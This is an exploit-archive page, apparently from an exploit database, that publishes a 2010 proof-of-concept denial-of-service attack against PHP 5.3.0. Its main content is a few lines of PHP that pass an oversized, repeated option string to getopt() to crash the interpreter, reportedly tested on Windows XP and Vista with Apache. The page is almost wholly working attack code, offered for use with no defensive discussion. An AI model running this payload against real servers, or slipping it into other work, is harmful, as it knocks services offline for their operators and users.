[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : PHP 5.3.0 getopt() Denial of Service
# Published : 2010-04-12
# Author : Napst3r
# Previous Title : MagnetoSoft NetworkResources ActiveX NetConnectionEnum SEH Overwrite POC
# Next Title : VMware Remote Console e.x.p build-158248 - format string vulnerability


<?php
#####################################################################
## PHP 5.3.0 getopt() Denial of service
## Tested on WIN XP FR SP3, WIN VISTA FR SP2, Apache, PHP 5.3.0
## Denial of service
## Author: Napst3r
## Greets To: My Laptop &  all My Friends
#####################################################################

$buffer  = str_repeat('A:', 9999);
$options = getopt($buffer);

?>